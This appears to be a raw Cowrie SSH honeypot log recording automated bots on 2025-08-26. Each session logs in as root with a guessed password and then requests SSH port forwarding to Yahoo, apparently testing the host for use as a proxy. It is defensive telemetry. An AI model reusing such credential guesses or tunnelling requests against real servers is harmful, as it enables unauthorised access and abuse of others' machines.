{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62144,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff378f233801","protocol":"ssh","message":"New connection: 213.209.150.239:62144 (1.2.3.4:22) [session: ff378f233801]","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.776087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.777084Z","src_ip":"213.209.150.239","session":"ff378f233801"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.833745Z","src_ip":"213.209.150.239","session":"ff378f233801"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.116001Z","src_ip":"213.209.150.239","session":"ff378f233801"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11029,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11029","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.174323Z","session":"ff378f233801"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.231143Z","src_ip":"213.209.150.239","session":"ff378f233801"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":9955,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9955","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.387204Z","session":"ff378f233801"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.443901Z","src_ip":"213.209.150.239","session":"ff378f233801"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.501511Z","src_ip":"213.209.150.239","session":"ff378f233801"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62188,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d05147469fb","protocol":"ssh","message":"New connection: 213.209.150.239:62188 (1.2.3.4:22) [session: 5d05147469fb]","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.557204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.558365Z","src_ip":"213.209.150.239","session":"5d05147469fb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.614879Z","src_ip":"213.209.150.239","session":"5d05147469fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.897427Z","src_ip":"213.209.150.239","session":"5d05147469fb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29002,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29002","sensor":"my-vps","timestamp":"2025-08-26T00:57:54.955124Z","session":"5d05147469fb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.011919Z","src_ip":"213.209.150.239","session":"5d05147469fb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":1227,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:1227","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.167014Z","session":"5d05147469fb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.223788Z","src_ip":"213.209.150.239","session":"5d05147469fb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.281179Z","src_ip":"213.209.150.239","session":"5d05147469fb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62235,"dst_ip":"1.2.3.4","dst_port":22,"session":"356a75e4de09","protocol":"ssh","message":"New connection: 213.209.150.239:62235 (1.2.3.4:22) [session: 356a75e4de09]","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.336730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.337753Z","src_ip":"213.209.150.239","session":"356a75e4de09"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.394447Z","src_ip":"213.209.150.239","session":"356a75e4de09"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.676571Z","src_ip":"213.209.150.239","session":"356a75e4de09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":411,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:411","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.733902Z","session":"356a75e4de09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.790632Z","src_ip":"213.209.150.239","session":"356a75e4de09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2290,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2290","sensor":"my-vps","timestamp":"2025-08-26T00:57:55.947032Z","session":"356a75e4de09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.003921Z","src_ip":"213.209.150.239","session":"356a75e4de09"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.061954Z","src_ip":"213.209.150.239","session":"356a75e4de09"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62281,"dst_ip":"1.2.3.4","dst_port":22,"session":"91adf02dacfa","protocol":"ssh","message":"New connection: 213.209.150.239:62281 (1.2.3.4:22) [session: 91adf02dacfa]","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.108157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.108827Z","src_ip":"213.209.150.239","session":"91adf02dacfa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.155681Z","src_ip":"213.209.150.239","session":"91adf02dacfa"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":49478,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc6aa3438aec","protocol":"ssh","message":"New connection: 27.112.78.170:49478 (1.2.3.4:22) [session: dc6aa3438aec]","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.180920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.185746Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.390333Z","src_ip":"213.209.150.239","session":"91adf02dacfa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":24501,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:24501","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.438114Z","session":"91adf02dacfa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.453465Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.485222Z","src_ip":"213.209.150.239","session":"91adf02dacfa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":31631,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31631","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.621468Z","session":"91adf02dacfa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.668410Z","src_ip":"213.209.150.239","session":"91adf02dacfa"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.715978Z","src_ip":"213.209.150.239","session":"91adf02dacfa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62315,"dst_ip":"1.2.3.4","dst_port":22,"session":"381816820624","protocol":"ssh","message":"New connection: 213.209.150.239:62315 (1.2.3.4:22) [session: 381816820624]","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.762256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.763166Z","src_ip":"213.209.150.239","session":"381816820624"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:56.810710Z","src_ip":"213.209.150.239","session":"381816820624"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.045695Z","src_ip":"213.209.150.239","session":"381816820624"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30137,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30137","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.093808Z","session":"381816820624"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.141018Z","src_ip":"213.209.150.239","session":"381816820624"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30964,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30964","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.277468Z","session":"381816820624"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.324859Z","src_ip":"213.209.150.239","session":"381816820624"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.373726Z","src_ip":"213.209.150.239","session":"381816820624"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62363,"dst_ip":"1.2.3.4","dst_port":22,"session":"08389e295fda","protocol":"ssh","message":"New connection: 213.209.150.239:62363 (1.2.3.4:22) [session: 08389e295fda]","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.419949Z"}
